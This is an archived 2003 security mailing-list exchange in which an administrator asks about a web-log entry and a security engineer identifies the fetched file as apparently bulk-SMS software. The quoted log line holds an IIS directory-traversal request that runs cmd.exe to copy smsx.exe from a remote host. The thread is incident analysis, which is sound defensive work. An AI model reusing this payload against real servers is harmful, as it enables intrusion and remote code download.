smsx.exe is not the Microsoft SMS product, it is probably this: http://www.superbank.ru/sms/ If you look at the bottom of the features page of this product, it is designed to send lots of SMS messages to hand help devices. http://www.superbank.ru/sms/SMSexpress.htm Your would be attacker is trying to get your machine to download software to send short messages to hand held devices. I have received a couple pieces of spam on my cell phone lately, so I am sensitive to this. Your would-be attacker's motives may be different. At 02:29 PM 5/5/2003 -0300, Steve Bromwich wrote: >Hi, > >Has anyone seen a request like this in their logs? > >205.247.193.56 - - [05/May/2003:11:59:52 -0300] >"/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rcp+-b+195.92.252.138.adm:smsx.exe+." > >I tried rcping smsx.exe off the remote site but no joy; is the .adm an >obscure windows-specific port address or something? One of our windows >guys said the smsx was "remote management software", but had no idea about >the .adm... > >On a side note, the response I got from energis (the 195.92.252.138 owner) >had the following at the start: > >PLEASE NOTE WE ARE CURRENTLY DEALING WITH A 2 WEEK BACKLOG > >Further down: > >Please note that if one of our IP addresses looks up to a 'webcache' (as >opposed to a modem) we have a *maximum* of 30 hours to trace the user >responsible for the abuse. > >So I guess this means that Energis users have a pretty good chance of >abusing remote servers through Energis' web cache and getting away with it >:-/ > >Cheers, Steve > >---------------------------------------------------------------------------- >Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the >world's premier event for IT and network security experts. The two-day >Training features 6 hand-on courses on May 12-13 taught by professionals. >The two-day Briefings on May 14-15 features 24 top speakers with no vendor >sales pitches. Deadline for the best rates is April 25. Register today to >ensure your place. http://www.securityfocus.com/BlackHat-incidents >---------------------------------------------------------------------------- ************************************************** Michael J. McCafferty Principal, Security Engineer M5 Computer Security 858-576-7325 Voice http://www.m5computersecurity.com ************************************************** --- "If you build it, they will hack !" --- ---------------------------------------------------------------------------- Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the world's premier event for IT and network security experts. The two-day Training features 6 hand-on courses on May 12-13 taught by professionals. The two-day Briefings on May 14-15 features 24 top speakers with no vendor sales pitches. Deadline for the best rates is April 25. Register today to ensure your place. http://www.securityfocus.com/BlackHat-incidents ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Tue May 06 2003 - 10:45:33 PDT